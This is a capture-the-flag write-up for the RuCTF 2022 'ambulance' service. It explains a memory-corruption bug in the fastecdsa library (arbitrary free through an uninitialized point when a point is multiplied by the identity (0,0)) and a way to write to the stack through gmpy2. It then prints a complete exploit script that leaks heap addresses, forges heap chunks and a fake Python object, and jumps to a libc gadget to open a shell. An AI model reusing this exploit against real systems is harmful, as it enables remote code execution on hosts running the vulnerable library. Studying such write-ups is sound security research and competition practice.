RuCTF 2022 — ambulance
Source code
Full source code is available here:
#!/usr/bin/env python3
import hashlib
from typing import Tuple
import utils
from fastecdsa.point import Point
from fastecdsa.curve import Curve
class CryptoError(Exception):
SecureCurve = Curve(
p = 0xa0fca03a870f6e3fc52aeef0d61f198fddc7a2c6bd414b3e5a1afc5a4a82009d,
a = 0x3458be7671950c6b01bed2734056c9217012fd1f07ee085afd504b412061e63c,
b = 0x0,
q = 0xa0fca03a870f6e3fc52aeef0d61f19915ca241a1b2e1cb33cb1434415514a902,
gx = 0x6a0ea6b596c2adb773a821e9c6799a0e8ab03e355560a64ac1eecb6df8bd92ba,
gy = 0x9e337b7d04c686771d18cd12a9b5174cb5b134be7ab09176c418bce4ff265de9,
oid = b's\xee\xccur\xee',
name = 'SecureCurve',
def hash(data: bytes) -> int:
return int.from_bytes(hashlib.sha3_256(data).digest(), 'big')
def generate_keypair() -> Tuple[str, str]:
d = utils.generate_random_number(1, SecureCurve.q - 1)
Q = d * SecureCurve.G
return (
utils.serialize_numbers_sequence(Q.x, Q.y),
def get_public_key(private_key: str) -> str:
d = utils.deserialize_number(private_key)
except utils.SerializationError as e:
raise CryptoError(f'invalid private key: {e}')
Q = d * SecureCurve.G
return utils.serialize_numbers_sequence(Q.x, Q.y)
def sign(message: bytes, private_key: str) -> str:
d = utils.deserialize_number(private_key)
except utils.SerializationError as e:
raise CryptoError(f'invalid private key: {e}')
k = utils.generate_random_number(1, SecureCurve.q - 1)
r = (k * SecureCurve.G).x
h = hash(utils.int_to_bytes(r) + message)
s = k - h * d
return utils.serialize_numbers_sequence(r, s)
def verify(message: bytes, public_key: str, signature: str) -> bool:
r, s = utils.deserialize_numbers_sequence(signature)
except utils.SerializationError:
return False
x, y = utils.deserialize_numbers_sequence(public_key)
Q = Point(x, y, curve=SecureCurve)
except utils.SerializationError as e:
raise CryptoError(f'invalid public key: {e}')
h = hash(utils.int_to_bytes(r) + message)
u = h * Q + s * SecureCurve.G
return u.x == r
#!/usr/bin/env python3
import json
from typing import List
class Disease:
class MentalDisease(Disease):
def __init__(self, name: str, phase: str) -> None: = name
self.phase = phase
def __str__(self) -> str:
return f'{} (mental), {self.phase} phase'
class InfectiousDisease(Disease):
def __init__(self, name: str, symptoms: List[str]) -> None: = name
self.symptoms = symptoms
def __str__(self) -> str:
symptoms = ', '.join(self.symptoms)
return f'{} (infectious); symptoms: {symptoms}'
class OtherDisease(Disease):
def __init__(self, name: str, type: str) -> None: = name
self.type = type
def __str__(self) -> str:
return f'{} ({self.type})'
NoDisease = Disease()
def serialize(disease: Disease) -> str:
if isinstance(disease, MentalDisease):
disease: MentalDisease
return json.dumps(
type = 'mental',
name =,
phase = disease.phase,
elif isinstance(disease, InfectiousDisease):
disease: InfectiousDisease
return json.dumps(
type = 'infectious',
name =,
symptoms = disease.symptoms,
elif isinstance(disease, OtherDisease):
disease: OtherDisease
return json.dumps(
type = disease.type,
name =,
raise TypeError(f'unknown disease type: {type(disease)}')
def deserialize(data: str) -> Disease:
obj = json.loads(data)
type = obj['type']
if type == 'mental':
return MentalDisease(
name = obj['name'],
phase = obj['phase'],
elif type == 'infectious':
return InfectiousDisease(
name = obj['name'],
symptoms = obj['symptoms'],
return OtherDisease(
name = obj['name'],
type = obj['type'],
Calling free()
on arbitrary pointer. There is a bug in fastecdsa python library.
Function curvemath_mul
in curvemath.c
fastecdsa can perform elliptic point multiplication ($d \cdot P$), which uses curvemath_mul
function internally:
static PyObject * curvemath_mul(PyObject *self, PyObject *args) {
char * x, * y, * d, * p, * a, * b, * q, * gx, * gy;
if (!PyArg_ParseTuple(args, "sssssssss", &x, &y, &d, &p, &a, &b, &q, &gx, &gy)) {
return NULL;
PointZZ_p result;
mpz_t scalar;
mpz_init_set_str(scalar, d, 10);
CurveZZ_p * curve = buildCurveZZ_p(p, a, b, q, gx, gy, 10);;
PointZZ_p * point = buildPointZZ_p(x, y, 10);
pointZZ_pMul(&result, point, scalar, curve);
char * resultX = mpz_get_str(NULL, 10, result.x);
char * resultY = mpz_get_str(NULL, 10, result.y);
mpz_clears(result.x, result.y, scalar, NULL);
PyObject * ret = Py_BuildValue("ss", resultX, resultY);
return ret;
- One can notice
PointZZ_p result
variable, which is not initialized properly. - Later this variable is cleared by
mpz_clears(result.x, result.y, scalar, NULL);
. mpz_clears
internally callsfree()
on the chunk containsmpz_t
.- If we could save
uninitialized, we could callfree()
on fake address.
How to remain result
Look at pointZZ_pMul()
function which uses result
void pointZZ_pMul(PointZZ_p * rop, const PointZZ_p * point, const mpz_t scalar, const CurveZZ_p * curve) {
// handle the identity element
if(pointZZ_pIsIdentityElement(point)) {
return pointZZ_pSetToIdentityElement(rop);
PointZZ_p R0, R1, tmp;
mpz_inits(R1.x, R1.y, tmp.x, tmp.y, NULL);
mpz_init_set(R0.x, point->x);
mpz_init_set(R0.y, point->y);
pointZZ_pDouble(&R1, point, curve);
int dbits = mpz_sizeinbase(scalar, 2), i;
for(i = dbits - 2; i >= 0; i--) {
if(mpz_tstbit(scalar, i)) {
mpz_set(tmp.x, R0.x);
mpz_set(tmp.y, R0.y);
pointZZ_pAdd(&R0, &R1, &tmp, curve);
mpz_set(tmp.x, R1.x);
mpz_set(tmp.y, R1.y);
pointZZ_pDouble(&R1, &tmp, curve);
else {
mpz_set(tmp.x, R1.x);
mpz_set(tmp.y, R1.y);
pointZZ_pAdd(&R1, &R0, &tmp, curve);
mpz_set(tmp.x, R0.x);
mpz_set(tmp.y, R0.y);
pointZZ_pDouble(&R0, &tmp, curve);
mpz_init_set(rop->x, R0.x);
mpz_init_set(rop->y, R0.y);
mpz_clears(R0.x, R0.y, R1.x, R1.y, tmp.x, tmp.y, NULL);
One could see that result
still remains unitialized if the first condition holds:
if(pointZZ_pIsIdentityElement(point)) {
return pointZZ_pSetToIdentityElement(rop);
And pointZZ_pIsIdentityElement
int pointZZ_pIsIdentityElement(const PointZZ_p * op) {
return mpz_cmp_ui(op->x, 0) == 0 && mpz_cmp_ui(op->y, 0) == 0 ? 1 : 0;
So, if the point has coordinates $(0, 0)$, it will be considered as identity element, and result
variable will remain unitialized.
Writing address inside result
We need to write our controlled address into stack.
After some searching I’ve found gmpy2 python library, which performs stack allocation (alloca()
) in GMPy_MPZ_To_Binary
function, located in gmpy2_binary.c file:
static PyObject *
GMPy_MPZ_To_Binary(MPZ_Object *self)
size_t size = 2;
int sgn;
char *buffer;
PyObject *result;
sgn = mpz_sgn(self->z);
if (sgn == 0) {
TEMP_ALLOC(buffer, size);
buffer[0] = 0x01;
buffer[1] = 0x00;
goto done;
size = ((mpz_sizeinbase(self->z, 2) + 7) / 8) + 2;
TEMP_ALLOC(buffer, size);
buffer[0] = 0x01;
if (sgn > 0)
buffer[1] = 0x01;
buffer[1] = 0x02;
mpz_export(buffer+2, NULL, -1, sizeof(char), 0, 0, self->z);
result = PyBytes_FromStringAndSize(buffer, size);
TEMP_FREE(buffer, size);
return result;
macro, defined in gmpy2.h:
#define TEMP_ALLOC(B, S) \
B = alloca(S); \
} else { \
if(!(B = malloc(S))) { \
PyErr_NoMemory(); \
return NULL; \
} \
#define TEMP_FREE(B, S) if(S >= ALLOC_THRESHOLD) free(B)
is used when serializing gmpy2.mpz
python object, and raw binary data will be written onto stack:
- Call
to write controlled address onto stack - Make point $(0, 0)$ and multiply it by something
- During the multiplication process
on controlled address will be triggered
Spawning shell with fake chunk
The rest is just a heap feng shui. For example:
The service interface allows an attacker to spawn
object. The allocator will reuse the same chunk for two objects, which have equal size. Using this primitive we can rewrite data at some location: repeatedly spawn objects of the same size. When someone frees a fake chunk inside an existing object, there will be two overlapped chunks.The service interface allows an attacker to create
object. The attacker could createlist
overlapped and rewrite few pointers oflist
elements.Also, the attacker could create fake python object, which base class is also fake python object. If he set object’s deallocator function to controlled address, this address will be called when object destroys.
How to leak address
The service contains the class Disease
and the object of this class:
class Disease:
NoDisease = Disease()
Python default __repr__
leaks the address of the object:
>>> print(NoDisease)
<__main__.Disease at 0x1037392a0>
By default this object is stored in User
structure, but it could be bypassed if the attacker updates disease in the other session. Then he could calculate offset to any python heap chunk.
How to make $(0, 0)$ point
Look at the SecureCurve
SecureCurve = Curve(
p = 0xa0fca03a870f6e3fc52aeef0d61f198fddc7a2c6bd414b3e5a1afc5a4a82009d,
a = 0x3458be7671950c6b01bed2734056c9217012fd1f07ee085afd504b412061e63c,
b = 0x0,
q = 0xa0fca03a870f6e3fc52aeef0d61f19915ca241a1b2e1cb33cb1434415514a902,
gx = 0x6a0ea6b596c2adb773a821e9c6799a0e8ab03e355560a64ac1eecb6df8bd92ba,
gy = 0x9e337b7d04c686771d18cd12a9b5174cb5b134be7ab09176c418bce4ff265de9,
oid = b's\xee\xccur\xee',
name = 'SecureCurve',
It has $b = 0$, therefore the curve contains $(0, 0)$ point. The attacker could set his public key to $(0, 0)$ using $\dfrac{q}{2}$ as private key (recovery_key
>>> SecureCurve.G * (SecureCurve.q // 2)
The exploit TLDR
- Leak address of
object and calculate offset to some chunk - Set public key to $(0, 0)$
- Create a fake chunk inside the controlled chunk
- Write the address on the stack using
- Free the fake chunk using point muptiplication (verifying password)
- Create list at fake chunk
- Create a fake object with deallocator function and rewrite some list pointers using chunk
- Destroy this object and drop shell
Example sploit
Sploit source code:
#!/usr/bin/env python3
import sys
import time
import struct
import secrets
import asyncio
import api
import utils
IP = sys.argv[1] if len(sys.argv) > 1 else ''
PORT = 17171
def p64(x: int) -> bytes:
return struct.pack('<Q', x)
async def attack(io: api.Ambulance, cmd: str) -> None:
await io.read_banner()
q = 0xa0fca03a870f6e3fc52aeef0d61f19915ca241a1b2e1cb33cb1434415514a902
zero_order = 0x507e501d4387b71fe29577786b0f8cc8ae5120d0d970e599e58a1a20aa8a5481
username = secrets.token_hex(8)
_, (password, _) = await io.register(username)
async with api.Ambulance.connect(IP, PORT) as io2:
await io2.read_banner()
await io2.login(username, password)
await io2.update_disease('vzlom', 'vzlom')
await io2.user_exit()
_, (_, disease) = await io.print_info()
address = disease.strip('<>\n').split(' ')[-1]
leak = int(address, 16)
print(f'leak @ 0x{leak:x}')
zero_key = utils.serialize_number(0x1234 * q + zero_order)
await io.change_recovery_key(password, zero_key)
print('set public key to zero')
payload = p64(0x4141414141414141) * 35
payload_password = utils.b64encode(payload)
await io.change_recovery_key(payload_password, '')
payload = b''.join([
p64(0x4141414141414141) * 30,
p64(0), p64(0x231),
p64(0x4242424242424242) * 3,
payload_password = utils.b64encode(payload)
await io.change_recovery_key(payload_password, '')
print('created buffer with fake chunk')
buffer = leak + 0xce150
print(f'buffer @ 0x{buffer:x}')
chunk = buffer + 8 * 32
print(f'chunk @ 0x{chunk:x}')
fake_number = b''.join([
b'\x08\x02' + b'\x01\x01',
b'A' * (0x510 - 2),
p64(0x0000000200000002), p64(chunk),
b'B' * (0x2f0 + 2 - 8 * 3),
fake_password = utils.b64encode(fake_number * 2)
await io.change_recovery_key(fake_password, '')
print('freed fake chunk')
symptoms = ' '.join(['X'] * 64)
await io.update_disease('infectious', 'vzlom', symptoms)
print('created list in fake chunk')
libc_base = leak + 0x5a2480
one_gadget = libc_base + 0xe3afe
payload = b''.join([
b'A' * 2,
p64(0x4343434343434343) * 4,
p64(0x0000000000000003), p64(buffer + 0x50),
p64(0x0000000000000000), p64(0x0000000000000000),
p64(0x0000000000000000), p64(0x0000000000000000),
p64(0x00000000000000ff), p64(0x000000000094bdc0),
p64(0x0000000000000000), p64(libc_base),
p64(0x4141414141414141), p64(0x4242424242424242),
p64(one_gadget), p64(0x4242424242424242),
p64(0x0000000000000000) * 14,
p64(buffer + 0x20) * 3
payload_password = utils.b64encode(payload)
await io.change_recovery_key(payload_password, '')
print('rewrited list')
await io.read_user_menu()
await io.read_prompt()
await io.writeline(b'1')
print('leaked libc first bytes')
print(repr(await io.readline()))
print(repr(await io.readline()))
await io.logout()
print('shell should be spawned')
await io.writeline(cmd.encode())
for _ in range(100):
line = await io.readline()
if len(line.strip()) == 0:
async def main() -> None:
cmd = 'id && ls -la && exit'
while True:
async with api.Ambulance.connect(IP, PORT) as io:
await attack(io, cmd)
except Exception as e:
if __name__ == '__main__':
Change anything that affects python memory layout. For example, switch from Python 3.9 to Python 3.10.
This solution may not work on arbitrary machine and/or patched service, but it was tested on vuln image and works perfectly.
CVE-2024-21502 was assigned to this bug: detailed writeup.